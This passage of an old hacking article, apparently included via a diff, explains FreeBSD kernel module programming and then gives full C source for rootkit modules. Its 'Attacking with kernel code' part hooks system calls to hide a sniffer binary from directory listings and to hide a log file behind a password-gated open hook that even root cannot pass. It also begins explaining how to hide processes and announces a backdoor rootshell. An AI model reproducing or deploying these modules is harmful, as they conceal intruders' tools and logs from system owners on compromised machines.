+    TAILQ_HEAD(, module) modules;	/* modules in this file */
+    void*		priv;		/* implementation data */
+
+    struct linker_file_ops* ops;
+};
+
+
+struct module {
+ TAILQ_ENTRY(module) link;
+ TAILQ_ENTRY(module) flink;
+ struct linker_file *file;
+ int refs;
+ int id;
+ char *name;
+ modeventhand_t handler;
+ void *arg;
+ modspecific_t data;
+};
+
+int errno;
+
+#define GD_ALLPROC       1
+#define GD_LINKFILES     2
+#define GD_MODULES       3
+
+
+/*structure for our getdata system call*/
+struct getdata_args {
+ /*this int value stands for the data the user wants to see*/
+ int what;
+ /*this is a user space buffer where we will put the data*/
+ char *buffer;
+};
+
+void print_allprocs()
+{
+ struct getdata_args gda;
+ int size;
+ struct proc *procs;
+ char *p;
+ int counter, tmp;
+
+ /*set the getdata fields*/
+ gda.what=GD_ALLPROC;
+ gda.buffer=NULL;
+ size=syscall (210, gda);
+
+ /*allocate some bytes*/
+ p=(char*)malloc(size); 
+ 
+ /*set the getdata fields*/
+ gda.what=GD_ALLPROC;
+ gda.buffer=(char*)p;
+ tmp=syscall(210, gda);
+ procs=(struct proc*)p;  
+
+ for (counter=0; counter<tmp; counter++)
+  printf("PID : %d\n", procs[counter].p_pid);
+ free(p); 
+}
+
+
+void print_files()
+{
+ struct getdata_args gda;
+ int size;
+ struct linker_file *procs;
+ char *p;
+ int counter, tmp;
+
+ /*set the getdata fields*/
+ gda.what=GD_LINKFILES;
+ gda.buffer=NULL;
+ size=syscall (210, gda);
+
+ printf("SIZE : %d\n", size);
+
+ /*allocate some bytes*/
+ p=(char*)malloc(size); 
+ 
+ /*set the getdata fields*/
+ gda.what=GD_LINKFILES;
+ gda.buffer=(char*)p;
+ tmp=syscall(210, gda);
+ printf("STRUCTS : %d\n", tmp);
+ procs=(struct linker_file*)p;  
+
+ for (counter=0; counter<tmp; counter++)
+  printf("ID : %d\n", procs[counter].id);
+
+ free(p); 
+}
+
+void print_modules()
+{
+ struct getdata_args gda;
+ int size;
+ struct module *procs;
+ char *p;
+ int counter, tmp;
+
+ /*set the getdata fields*/
+ gda.what=GD_MODULES;
+ gda.buffer=NULL;
+ size=syscall (210, gda);
+
+ printf("SIZE : %d\n", size);
+
+ /*allocate some bytes*/
+ p=(char*)malloc(size); 
+ 
+ /*set the getdata fields*/
+ gda.what=GD_MODULES;
+ gda.buffer=(char*)p;
+ tmp=syscall(210, gda);
+ printf("STRUCTS : %d\n", tmp);
+ procs=(struct module*)p;  
+ /*print the id of every module loaded so far*/
+ for (counter=0; counter<tmp; counter++)
+  printf("ID : %d\n", procs[counter].id);
+ free(p); 
+}
+
+
+
+int
+main(int argc, char **argv)
+{
+ print_modules();
+ return 0;
+}
+</xmp>
+
+Arghh, I hope no computer science professor will see this, it's a cruel kind of
+programming ;), but working [I hate it too loose time with nice software
+design...]. Of course, it would be very easy to make this program more
+compact, but I also wrote it this way to make it easier to understand. The
+different print_* functions will put out the desired information. The
+syscall() function calls a certain system call plus required arguments.<br>
+NOTE :
+This module is no perfect solution. Try to access a field like filename in a
+linker_file structure you get vie print_files. You will get a nice error, why?
+Look at the following image :
+<xmp>
+user space :
+
+----------------------------------------------------------------------------
+
+kernel space :            one linker_file structure             
+                          +++++++++++++++++++++++++
+                          +...                    +  
+                          + char *filename        +  ---------> name
+                          +...			  +  points to an address in
+   			  +...			  +  kernel space
+  			  +...			  +
+
+</xmp>
+Now what did our system call, take a look at the next image :
+<xmp>
+
+user space :              one linker_file structure             
+                          +++++++++++++++++++++++++
+                          +...                    +  
+                          + char *filename        +  ----
+                          +...			  +     |
+   			  +...			  +     |
+  			  +...			  +     |
+       							|
+							|
+							|
+----------------------------------------------------------------------------
+ 							|
+kernel space :						|
+ 							|---> name
+
+
+</xmp>
+Do you see the problem? The char* filename pointer still points to the old
+address in kernel space while the linker_file structure was move to user
+space. This means you cannot access any pointer fields in the structures /
+lists exported by TheSeeker module. Of course, you could also transform those
+address to user space, but that would be too complicated for a beginner
+example, so I did not implement it. Of course you can access any other fields
+that don't point to some location.
+
+<p>
+<H3><A NAME="I.8."></A>8. From User to Kernel space and back</h3>
+<p>
+
+In TheSeeker I introduced some kernel functions that were responsible for user
+<-> kernel space transitions. The following list shows all functions that are
+important for that task :
+<ul>
+<li>int copyin(const void *uaddr, void *kaddr, size_t len);<br>
+->copies len bytes from user space (uaddr) to kernel space (kaddr)<br>
+
+<li>int copyout(const void *kaddr, void *uaddr, size_t len);<br>
+->copies len bytes from kernel space (kaddr) to user space (uaddr)<br>
+
+<li>int copyinstr(const void *uaddr, void *kaddr, size_t len, size_t
+*done);<br> 
+->copies NUL-terminated string, at most len bytes long, fom user
+space (uaddr) to kernel space (kaddr). The number of bytes actually copied
+is returned in done.<br>
+</ul>
+I always used these functions. There are also some other byte-oriented
+functions (like fetch etc.) but I nver used them.
+The easiest task is to copy from user to kerne space. You have only to provide
+a buffer in kernel space. Take a look at the following fragment (taken from
+my directory hack) :
+<xmp>
+/*We need to define M_DIRP2 for allocating some memory in kernel space with
+  the help of the MALLOC macro*/
+MALLOC_DEFINE(M_DIRP2, "dirp2", "struct");
+
+...
+
+struct dirent *dirp2, *dirp3;
+  
+...
+
+/*allocate memory*/ 
+MALLOC(dirp2, struct dirent*, tmp, M_DIRP2, M_NOWAIT);
+
+...
+
+/*copy from user space (uap->buf) to kernel space (dirp2) tmp bytes*/
+copyin(uap->buf, dirp2, tmp);
+
+</xmp>
+Look at the MALLOC man page for more details. Of course you could also use
+something like char mem[100]; instead of MALLOC, but malloc is the better
+choice.<br>
+So copyin from user to kernel space a trivial. But what about the other
+direction? You have to differentiate between two cases : is there already an
+allocated buffer for the process in user space? If so just use copyout and you
+are done. But what to do if you don't have a memory buffer in user space. Look
+at my solution (I made lots of comments for beginners, please read them :)):
+<xmp>
+/*This example demonstrates how to use the OBREAK syscall to issue a system
+call from kernel mode. I implemented a syscall (offset 210) which will create
+a directory (TESTDIR) by using the mkdir syscall. The general problem with
+this task is supplying the arguments for mkdir from +user space+.*/
+
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysproto.h>
+#include <sys/sysent.h>
+#include <sys/proc.h>
+#include <sys/syscall.h>
+
+
+/* 
+ * Shareable process virtual address space.
+ * May eventually be merged with vm_map.
+ * Several fields are temporary (text, data stuff).
+ */
+struct vmspace {
+/*NOTE : I just used some padding stuff, to avoid too much include file
+         problems...
+*/
+/*	struct vm_map vm_map;	 VM address map */
+        char pad1[100];
+/*	struct pmap vm_pmap;	 private physical map */
+        char pad2[36];
+	int vm_refcnt;		/* number of references */
+	caddr_t vm_shm;		/* SYS5 shared memory private data XXX */
+/* we copy from vm_startcopy to the end of the structure on fork */
+#define vm_startcopy vm_rssize
+	segsz_t vm_rssize;	/* current resident set size in pages */
+	segsz_t vm_swrss;	/* resident set size before last swap */
+	segsz_t vm_tsize;	/* text size (pages) XXX */
+	segsz_t vm_dsize;	/* data size (pages) XXX */
+	segsz_t vm_ssize;	/* stack size (pages) */
+	caddr_t vm_taddr;	/* user virtual address of text XXX */
+	caddr_t vm_daddr;	/* user virtual address of data XXX */
+	caddr_t vm_maxsaddr;	/* user VA at max stack growth */
+	caddr_t vm_minsaddr;	/* user VA at max stack growth */
+};
+
+
+
+/*just a simple syscall handler which will create a dir entry*/
+static int user_syscall (struct proc *p, void *arg)
+{      
+ /*example directory we want to create from kernel space via syscall
+   recall that this string is saved in kernel context and not in user space
+   is we need it*/
+ char *kernel_name="./TESTDIR\0";
+
+ /*this will hold our address in user space (for the directory name)*/
+ char *user_name;
+
+ /*one structure for kernel space and one for the user part :
+   This structure is used by the syscall mkdir for holding the required
+   arguments (see system call listing)*/
+ struct mkdir_args kernel_ma;
+ struct mkdir_args *user_ma;
+
+ /*we need to allocate memory, so we use the easiest way : syscall obreak*/
+ struct obreak_args oa;
+
+ /*the process we want to 'abuse' for saving our data in its VM space.
+ I used curproc which always points to the current process.*/
+ struct proc *userproc=curproc;
+
+ /*NOTE : The following stuff is very experimental !
+   ----
+ */
+
+ /* 
+   allocate 4096 bytes of heap memory for the user space args :
+   ctob : transforms a given page count to the corresponding bytes count;
+          of course, this calculation depends on the underlying architecture
+   btoc : this is the counterpart to ctob
+ */
+ oa.nsize=userproc->p_vmspace->vm_daddr+ctob(userproc->p_vmspace->vm_dsize)+
+          4096; 
+
+ /*this is just for debugging*/
+ printf("Process ID                    : %d\n", userproc->p_pid);
+ printf("OLD DATA SEGMENT SIZE (bytes) : %d\n", ctob(userproc->p_vmspace->vm_dsize));
+ printf("OBREAK RETURN VALUE           : %d\n",obreak(userproc, &oa));
+ printf("NEW DATA SEGMENT SIZE (bytes) : %d\n", ctob(userproc->p_vmspace->vm_dsize));
+ 
+ /*move our directory name to a random location in the user space data segment
+   range (within the newly allocated page*/ 
+ user_name=oa.nsize-80; 
+
+ /*use copyout, which is able to copy from kernel to user space*/
+ copyout(kernel_name, user_name, strlen(kernel_name));
+
+ /*just for debugging : where did we save the name in user space?*/
+ printf("USER NAME ADDRESS  : %p\n", user_name);
+
+ /*now it gets a bit tricky : 
+   --------------------------
+   we move the VM address from user space into the kernel_ma.path pointer in
+   kernel space*/  
+
+ kernel_ma.path=oa.nsize-80;
+ 
+ /*creation mode = 0*/
+ kernel_ma.mode=0;  
+
+ /*NOW the kernel_ma structure is ok, we can copy this structure to user space
+ */ 
+
+ /*select a place (within the allocated page) where to put the user_ma
+   structure*/
+ user_ma=(struct mkdir_args*)oa.nsize-50;
+
+ /*again a copyout*/
+ copyout(&kernel_ma, user_ma, sizeof(struct mkdir_args));
+
+ /*again some debug messages*/
+ printf("USER STRUCT ADDRESS : %p\n",user_ma);
+
+ /*Issue the mkdir syscall. Did we succeed ? Zero return value stands for
+   success.*/  
+ printf("MKDIR RETURN        : %d\n", mkdir(userproc, user_ma));
+
+ return 0;
+}
+
+/*
+ * The `sysent' for the new syscall
+ */
+static struct sysent user_syscall_sysent = {
+        0,	
+	user_syscall			/* sy_call */
+};
+
+/*
+ * The offset in sysent where the syscall is allocated.
+ */
+
+/*210 is a free slot in FreeBSD 3.1*/
+static int offset = 210;
+
+/*
+ * The function called at load/unload.
+ */
+static int
+load (struct module *module, int cmd, void *arg)
+{
+ /*no special processing here*/
+ return 0;
+}
+
+SYSCALL_MODULE(syscall, &offset, &user_syscall_sysent, load, NULL);
+</xmp>
+The comments should make everything quite clear. The general idea is to use
+the obreak system call to allocate some memory (move the vm_daddr).
+
+<p>
+<H3><A NAME="I.9."></A>9. Last Words</h3>
+<p>
+I hope you understood the stuff I mentioned in this basic section. It's really
+important that you get the general ideas in order to understand part II.<br>
+You should take a look at the man pages of section 9. There you can find some
+interesting kernel functions that will be useful sometimes.
+
+<p>
+<H3><A NAME="II."></A>II. Attacking with kernel code</h3>
+<p>
+The general layout of this article is based on my Linux article. Part II Fun
+& Profit will deal with ways to attack a FreeBSD system with modules. My Linux
+article shows nearly every aspect of attacking a system with kernel code. The
+FreeBSD part here is based on the ideas of Linux LKM hacks (I only added some
+items special for FreeBSD). This FreeBSD part will only present those modules,
+that needed big code/strategy modifications according to the Linux ones.
+
+<p>
+<H3><A NAME="II.1."></A>1. How to intercept system calls</h3>
+<p>
+Intercepting systemcalls on FreeBSD is nearly the same like doing this on a
+Linux Box. Again we start with a very very basic example :
+<xmp>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysproto.h>
+#include <sys/sysent.h>
+#include <sys/proc.h>
+#include <sys/syscall.h>
+
+
+/*The hacked system call*/
+static int
+hacked_mkdir (struct proc *p, struct mkdir_args *ua)
+{      
+ /*the only thing we do is printing a debug message*/
+ printf("MKDIR SYSCALL :  %s\n", ua->path);
+ return	mkdir(p, ua);
+}
+
+
+/*the sysentry for the hacked system call. Be careful, argument count must be
+same for the hacked and the origanel system call (here 1)*/
+
+static struct sysent
+hacked_mkdir_mkdir_sysent = {        
+       1,	
+       hacked_mkdir			/* sy_call */
+};
+
+
+/*our load function*/
+static int
+dummy_handler (struct module *module, int cmd, void *arg)
+{
+ int error = 0;
+
+ switch (cmd) {
+  case MOD_LOAD :
+   /*replace the mkdir syscall with our own*/
+   sysent[SYS_mkdir]=hacked_mkdir_mkdir_sysent;
+  break;
+  case MOD_UNLOAD :
+   /*argument count has not changed, so we only need to restore the
+   function pointer*/
+   sysent[SYS_mkdir].sy_call=(sy_call_t*)mkdir;
+  break;
+  default :
+   error = EINVAL;
+  break;
+ }
+ return error;
+}
+  
+static moduledata_t syscall_mod = {
+ "Intercept", 
+ dummy_handler,
+ NULL
+};
+
+DECLARE_MODULE(syscall, syscall_mod, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
+  
+</xmp>
+As you can see you don't have to save the old sysent entry, you just refer to
+the original system call function (no problems like those we had with Linux
+concerning public and private kernel items).<br>
+Compile this module (as always take the Makefile from part I) and load it.
+Every mkdir system call will produce a nice debug message. <br>
+For those who don't know which system call to intercept, again : read my Linux
+article. On FreeBSD ktrace can be quite useful.
+
+<p>
+<H3><A NAME="II.2."></A>2. Filesystem related hacks</h3>
+<p>
+Like the Linux one, we first start with filesystem hacks. They are really
+important for hiding our tools & logs.
+
+<p>
+<H3><A NAME="II.2.1."></A>2.1. How to hide files</h3>
+<p>
+
+The following module represents the getdirentries hack that will hide a certain
+file from directory listings made by commands like 'ls' :<br>
+Note :
+In Phrack (Volume 7, Issue 51 September 01, 1997, article 09) halflife already
+presented a nice hack for this problem. It was implemented under FreeBSD 2.2
+using the LKM scheme. He used a very short and good way to manage file hiding.
+My code below does the same stuff for FreeBSD 3.x systems. My approach is not
+so short, because I did user <-> kernel space transitions for clearness. The
+whole thing would also work without this stuff, but my module can easily be
+extended to do other things, because all relevant structures are copied to
+kernel space so you can modify them how ever you want before they are copied
+back.
+
+<xmp>
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysproto.h>
+#include <sys/sysent.h>
+#include <sys/proc.h>
+#include <sys/syscall.h>
+#include <sys/file.h>
+#include <sys/malloc.h>
+#include <sys/types.h>
+#include <dirent.h>
+
+
+/*We need to define M_DIRP2 for allocating some memory in kernel space with
+  the help of the MALLOC macro*/
+MALLOC_DEFINE(M_DIRP2, "dirp2", "struct");
+
+
+/*This hack is based on the getdents idea from some linux LKMs. FreeBSD is
+ a bit more tricky, but it works.*/
+static int
+hacked_getdirentries (struct proc *p, struct getdirentries_args *uap)
+{      
+ unsigned int tmp, n, t;
+ struct dirent *dirp2, *dirp3;
+  
+ /*The file we want to hide : The name must match exactly !*/
+ char hide[]="sniffer";
+
+ /*just issue the syscall*/
+ getdirentries(p,uap);
+ 
+ /*this is the way BSD returns status values to the process issueing the
+   request.*/
+ tmp=p->p_retval[0];
+ 
+ if (tmp>0)
+ { 
+  /*allocate memory*/
+  MALLOC(dirp2, struct dirent*, tmp, M_DIRP2, M_NOWAIT);
+  /*copy the dirent structure for user space in our kernel space*/
+  copyin(uap->buf, dirp2, tmp);
+
+  /*dirp3 points to dirp2*/
+  dirp3=dirp2;
+ 
+  t=tmp;
+  
+  /*In this loop we check for every dirent structure in the user buffer*/
+  while (t > 0)
+  {
+   n = dirp3->d_reclen;
+   t-=n;
+   /*Do we have the entry for our file to hide*/
+   if (strcmp((char*)&(dirp3->d_name), (char*)&hide)==0) 
+   {
+    if (t!=0)  
+    {
+     /*ATTENTION : Do not use something like strcpy or so. bcopy is able to
+                   handle overlapping memroy locations, so this is our choice*/
+     bcopy((char*)dirp3+n,dirp3, t);
+    }
+    /*the dirent structure list is shorter now*/
+    tmp-=n;
+   }
+   /*The following piece of code is necessary, because we get one dirent entry
+     with d_reclen=0, if we would not implement this, we would get an infinite
+     while loop*/
+   if (dirp3->d_reclen==0) 
+   {
+    /*end is reached*/
+    t=0;
+   }
+   /*as long as there is something to copy, do it*/
+   if (t!=0)
+    /*get the next pointer from the dirent structure list*/ 
+    dirp3=(struct dirent*)((char*)dirp3+dirp3->d_reclen); 
+  }
+  /*we must decrement the getdirentries user call return value, if we changed
+    something*/
+   p->p_retval[0]=tmp; 
+
+  /*copy the whole (perhaps modified) memory back to the user buffer*/
+  copyout(dirp2, uap->buf, tmp);
+ 
+  /*free kernel memory*/
+  FREE(dirp2, M_DIRP2);
+ }
+ /*everything ok, so return 0*/
+ return	0;
+}
+
+/*the hacked getdirentries syscall*/
+static struct sysent hacked_getdirentries_sysent = {
+       4,	
+       hacked_getdirentries			/* sy_call */
+};
+
+
+
+/*
+ * The function called at load/unload.
+ */
+static int
+dummy_handler (struct module *module, int cmd, void *arg)
+{
+ int error = 0;
+
+ switch (cmd) {
+  case MOD_LOAD :
+   /*replace the getdirentries syscall with our own*/
+   sysent[196]=hacked_getdirentries_sysent;
+  break;
+  case MOD_UNLOAD :
+   /*argument count has not changed, so we only need to restore the
+   function pointer*/
+   sysent[196].sy_call=(sy_call_t*)getdirentries;
+  break;
+  default :
+   error = EINVAL;
+  break;
+ }
+ return error;
+}
+
+/*you will recognize that this part is the same (I only changed the module
+  name) for every module I present.*/
+static moduledata_t syscall_mod = {
+ "FileHider", 
+ dummy_handler,
+ NULL
+};
+
+DECLARE_MODULE(syscall, syscall_mod, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
+</xmp>
+The general idea is the same for FreeBSD and Linux, but there are some
+differences concerning the coding. Especially the return value modification
+must be done in a different way. My comments should be clear, so try it. 
+
+<p>
+<H3><A NAME="II.2.2."></A>2.2 How to hide the file contents</h3>
+<p>
+The following implementation is an extension to the Linux one. The Linux module
+was hiding a file contents so that a 'cat filename' returned with a 'file does
+not exist' errror. I implemented no way for you (hacker) to access this file, I
+only suggested some methods how to do it. The following module also implements
+a way to access it by you :
+<xmp>
+/*This module demonstrates how to make a file unaccessible. It has a
+authentication scheme which allows someone using the correct password (here
+007) to access the file. Only this user (represented by UID) can access it
+later. The password (007) is given through a newly defined syscall.*/
+
+#include <sys/types.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/module.h>
+#include <sys/sysent.h>
+#include <sys/kernel.h>
+#include <sys/systm.h>
+#include <sys/linker.h>
+#include <sys/sysproto.h>
+#include <sys/sysent.h>
+#include <sys/proc.h>
+#include <sys/syscall.h>
+#include <sys/file.h>
+#include <sys/malloc.h>
+#include <sys/types.h>
+#include <dirent.h>
+
+/*this variable will hold the UID of the user who issued the system call with
+the correct code*/
+
+uid_t access_uid=-1;
+
+/*code for authentication*/
+
+#define CODE 007
+
+
+/* 
+ * Shareable process virtual address space.
+ * May eventually be merged with vm_map.
+ * Several fields are temporary (text, data stuff).
+ */
+struct vmspace {
+/*NOTE : I just used some padding stuff, to avoid too much include file
+         problems...
+*/
+/*	struct vm_map vm_map;	 VM address map */
+        char pad1[100];
+/*	struct pmap vm_pmap;	 private physical map */
+        char pad2[36];
+	int vm_refcnt;		/* number of references */
+	caddr_t vm_shm;		/* SYS5 shared memory private data XXX */
+/* we copy from vm_startcopy to the end of the structure on fork */
+#define vm_startcopy vm_rssize
+	segsz_t vm_rssize;	/* current resident set size in pages */
+	segsz_t vm_swrss;	/* resident set size before last swap */
+	segsz_t vm_tsize;	/* text size (pages) XXX */
+	segsz_t vm_dsize;	/* data size (pages) XXX */
+	segsz_t vm_ssize;	/* stack size (pages) */
+	caddr_t vm_taddr;	/* user virtual address of text XXX */
+	caddr_t vm_daddr;	/* user virtual address of data XXX */
+	caddr_t vm_maxsaddr;	/* user VA at max stack growth */
+	caddr_t vm_minsaddr;	/* user VA at max stack growth */
+};
+
+
+/*arguments for the check_code system call*/
+struct check_code_args {
+ int code;
+};
+
+/*after this check only the one who issued the syscall from user space is able
+to access the file/directory or whatever (only this UID can access it). Of
+course, before, he must supply the correct code.*/ 
+
+static 
+void check_code(struct proc *p, struct check_code_args *uap)
+{
+ if (uap->code==CODE)
+  access_uid=p->p_cred->pc_ucred->cr_uid;
+ else 
+  access_uid=-1;
+}
+
+
+/*the hacked open syscall*/
+static 
+int hacked_open(struct proc *p, struct open_args *uap)
+{
+ char name[255];
+ /*the file we want to hide*/
+ char hide_name[]="sniffer.log";
+ size_t done;
+
+ /*get name*/
+ copyinstr(uap->path, name, 255, &done);
+ /*do we have the right file name?*/
+ if (strcmp((char*)&name, (char*)&hide_name)==0)
+ {
+  /*does this user have the right to access the file*/
+  if (access_uid==p->p_cred->pc_ucred->cr_uid)
+  {
+   /*if so, do a normal open*/
+   return open(p, uap);
+  }
+  /*no he has not got the right*/
+  else
+   /*standing for 'no such file or directory*/
+   return ENOENT;
+ }
+ /*if we don't have our file, just continue*/ 
+ return open(p, uap);
+}
+
+
+/*the hacked open syscall*/
+static struct sysent hacked_open_sysent = {
+       3,	
+       hacked_open			/* sy_call */
+};
+
+
+/*check code sysentry*/
+static struct sysent check_code_sysent = {
+       1,
+       check_code
+};
+
+/*
+ * The function called at load/unload.
+ */
+static int
+dummy_handler (struct module *module, int cmd, void *arg)
+{
+ int error = 0;
+ switch (cmd) {
+  case MOD_LOAD :
+   /*replace the open syscall with our own*/
+   sysent[SYS_open]=hacked_open_sysent;
+   /*install check code system call (slot/number 210)*/
+   sysent[210]=check_code_sysent;
+  break;
+  case MOD_UNLOAD :
+   /*argument count has not changed, so we only need to restore the
+   function pointer*/
+   sysent[SYS_open].sy_call=(sy_call_t*)open;
+  break;
+  default :
+   error = EINVAL;
+  break;
+ }
+ return error;
+}
+                                                   
+          
+static moduledata_t syscall_mod = {
+ "OpenHide", 
+ dummy_handler,
+ NULL
+};
+
+DECLARE_MODULE(syscall, syscall_mod, SI_SUB_DRIVERS, SI_ORDER_MIDDLE);
+</xmp>
+
+The open hack in general should be clear. If we have our filename we just
+return 'no such file...'. The solution I present to access this file via an
+authentication scheme is quite powerful. The user space program is very easy,
+just issue a system call with syscall() with the correct code (I won't present
+code because it's really too easy).<br>
+After providing the correct code only you (your UID) has access to this file.
+Even root cannot access it (he will also get 'no such file...').
+
+<p>
+<H3><A NAME="II.2.3."></A>2.3 And the rest?</h3>
+<p>
+Those who read my Linux LKM article will recognize that I explained more hacks
+(like file operation redirection, mkdir interception etc.). Why don't I
+present them here? Because these hacks are trivial to implement after the
+things I said already. 
+
+<p>
+<H3><A NAME="II.3."></A>3. Process related hacks</h3>
+<p>
+This section will introduce some modules making it possible to hide any
+process and install a backdoor rootshell. 
+
+<p>
+<H3><A NAME="II.3.1."></A>3.1 How to hide any process</h3>
+<p>
+Well, I have to admit that it wasn't very easy to make this possible on
+FreeBSD. And the following solution is quite experimental (but working, of
+course). You have to know that FreeBSD uses the so called KVM library to get
+information on the processes of the system (it is a library interface to the
+allproc and zombroc lists). Besides this, commands like top also use the
+procfs. This means we have to attack two points. Hiding an entry from the
+procfs is easy (just hide the PID from getdirentries), but what about the KVM
+lib. Let me explain some words. The following explaination makes things easier
+than they are in reality, but it's enough for a general understanding.
+We start with a code snippet from the 'ps' command :
+<xmp>
+/*
+	 * select procs
+	 */
+	if ((kp = kvm_getprocs(kd, what, flag, &nentries)) == 0)
+		errx(1, "%s", kvm_geterr(kd));
+      
+	if ((kinfo = malloc(nentries * sizeof(*kinfo))) == NULL)
+		err(1, NULL);
+	printf("SIZE %d\n", nentries*sizeof(*kinfo));
+       for (i = nentries; --i >= 0; ++kp) {
+		kinfo[i].ki_p = kp;
+		if (needuser)
+			saveuser(&kinfo[i]);
+		dynsizevars(&kinfo[i]);
+	}
+
+	sizevars();
+
+	/*
+	 * print header
+	 */
+	printheader();
+	if (nentries == 0)
+		exit(0);
+	/*
+	 * sort proc list
+	 */
+	qsort(kinfo, nentries, sizeof(KINFO), pscomp);
+	/*
+	 * for each proc, call each variable output function.
+	 */
+	for (i = lineno = 0; i < nentries; i++) {
+		if (xflg == 0 && (KI_EPROC(&kinfo[i])->e_tdev == NODEV ||
+		    (KI_PROC(&kinfo[i])->p_flag & P_CONTROLT ) == 0))
+			continue;
+		for (vent = vhead; vent; vent = vent->next) {
+			(vent->var->oproc)(&kinfo[i], vent);
+			if (vent->next != NULL)
+				(void)putchar(' ');
+		}
+		(void)putchar('\n');
+		if (prtheader && lineno++ == prtheader - 4) {
+			(void)putchar('\n');
+			printheader();
+			lineno = 0;
+		}
+	}
+	exit(eval);
+
+There is only one line interesting for us :
+
+if ((kp = kvm_getprocs(kd, what, flag, &nentries)) == 0)
+
+</xmp>
+
+Note :
+what=KERN_PROC_ALL   for commands like 'ps'     flag=0<br>
+what=KERN_PRC_PID    for commands like 'ps PID' flag=PID<br>
+
+The  kvm_getprocs function (from the KVM lib) is the user space interface to
+access the kernel process lists. So let's take a look at this function in the
+library :
+<xmp>
+struct kinfo_proc *
+kvm_getprocs(kd, op, arg, cnt)
+	kvm_t *kd;
+	int op, arg;
+	int *cnt;
+{
+	int mib[4], st, nprocs;
+	size_t size;
+
+	if (kd->procbase != 0) {
+		free((void *)kd->procbase);
+		/*
+		 * Clear this pointer in case this call fails.  Otherwise,
+		 * kvm_close() will free it again.
+		 */
+		kd->procbase = 0;
+	}
+	if (ISALIVE(kd)) {
+		size = 0;
+		mib[0] = CTL_KERN;
+		mib[1] = KERN_PROC;
+		mib[2] = op;
+		mib[3] = arg;
+		st = sysctl(mib, op == KERN_PROC_ALL ? 3 : 4, NULL, &size, NULL, 0);
+		if (st == -1) {
+			_kvm_syserr(kd, kd->program, "kvm_getprocs");
+			return (0);
+		}
+		do {
+			size += size / 10;
+			kd->procbase = (struct kinfo_proc *)
+			    _kvm_realloc(kd, kd->procbase, size);
+			if (kd->procbase == 0)
+				return (0);
+			st = sysctl(mib, op == KERN_PROC_ALL ? 3 : 4,
+			    kd->procbase, &size, NULL, 0);
+		} while (st == -1 && errno == ENOMEM);
+		if (st == -1) {
+			_kvm_syserr(kd, kd->program, "kvm_getprocs");
+			return (0);
+		}
+		if (size % sizeof(struct kinfo_proc) != 0) {
+			_kvm_err(kd, kd->program,
+				"proc size mismatch (%d total, %d chunks)",
+				size, sizeof(struct kinfo_proc));
+			return (0);
+		}
+		nprocs = size / sizeof(struct kinfo_proc);
+	} else {
+		struct nlist nl[4], *p;
+
+		nl[0].n_name = "_nprocs";
+		nl[1].n_name = "_allproc";
+		nl[2].n_name = "_zombproc";
+		nl[3].n_name = 0;
+
+		if (kvm_nlist(kd, nl) != 0) {
+			for (p = nl; p->n_type != 0; ++p)
+				;
+			_kvm_err(kd, kd->program,
+				 "%s: no such symbol", p->n_name);
+			return (0);
+		}
+		if (KREAD(kd, nl[0].n_value, &nprocs)) {
+			_kvm_err(kd, kd->program, "can't read nprocs");
+			return (0);
+		}
+		size = nprocs * sizeof(struct kinfo_proc);
+		kd->procbase = (struct kinfo_proc *)_kvm_malloc(kd, size);
+		if (kd->procbase == 0)
+			return (0);
+
+		nprocs = kvm_deadprocs(kd, op, arg, nl[1].n_value,
+				      nl[2].n_value, nprocs);
+#ifdef notdef
+		size = nprocs * sizeof(struct kinfo_proc);
+		(void)realloc(kd->procbase, size);
+#endif
+	}
+	*cnt = nprocs;
+	return (kd->procbase);
+}
+</xmp>
+Look at the ISALIVE if construct. Here the library call decides wether it looks
+for 'living' procs (->allprocs list) or 'dead' procs (->zombrocs). My further
+explaination (and module) is based on a 'living' process (what worth is a
+'dead' sniffer ?). So let's take a look at that case.<br>
+First of all a MIB array is constructed where the operation (op) and an
+argument (arg) is inserted. The other two fields are predefined. The op field
+is equal to the what value from the ps program (KERN_PROC_ALL, for example)
+and the arg field is equal to the flag variable in ps.c (1 or 0). After this
+a sysctl is issued with the corresponding MIB.<br>
+This sysctl call finally reaches sysctl_kern_proc :
+<xmp>
+static int
+sysctl_kern_proc SYSCTL_HANDLER_ARGS
+{
+	int *name = (int*) arg1;
+	u_int namelen = arg2;
+	struct proc *p;
+	int doingzomb;
+	int error = 0;
+
+	if (oidp->oid_number == KERN_PROC_PID) {
+		if (namelen != 1) 
+			return (EINVAL);
+		p = pfind((pid_t)name[0]);
+		if (!p)
+			return (0);
+		error = sysctl_out_proc(p, req, 0);
+		return (error);
+	}
+	if (oidp->oid_number == KERN_PROC_ALL && !namelen)
+		;
+	else if (oidp->oid_number != KERN_PROC_ALL && namelen == 1)
+		;
+	else
+		return (EINVAL);
+	
+	if (!req->oldptr) {
+		/* overestimate by 5 procs */
+		error = SYSCTL_OUT(req, 0, sizeof (struct kinfo_proc) * 5);
+		if (error)
+			return (error);
+	}
+	for (doingzomb=0 ; doingzomb < 2 ; doingzomb++) {
+		if (!doingzomb)
+			p = allproc.lh_first;
+		else
+			p = zombproc.lh_first;
+		for (; p != 0; p = p->p_list.le_next) {
+			/*
+			 * Skip embryonic processes.
+			 */
+			if (p->p_stat == SIDL)
+				continue;
+			/*
+			 * TODO - make more efficient (see notes below).
+			 * do by session.
+			 */
+			switch (oidp->oid_number) {
+
+			case KERN_PROC_PGRP:
+				/* could do this by traversing pgrp */
+				if (p->p_pgrp == NULL || 
+				    p->p_pgrp->pg_id != (pid_t)name[0])
+					continue;
+				break;
+
+			case KERN_PROC_TTY:
+				if ((p->p_flag & P_CONTROLT) == 0 ||
+				    p->p_session == NULL ||
+				    p->p_session->s_ttyp == NULL ||
+				    p->p_session->s_ttyp->t_dev != (dev_t)name[0])
+					continue;
+				break;
+
+			case KERN_PROC_UID:
+				if (p->p_ucred == NULL || 
+				    p->p_ucred->cr_uid != (uid_t)name[0])
+					continue;
+				break;
+
+			case KERN_PROC_RUID:
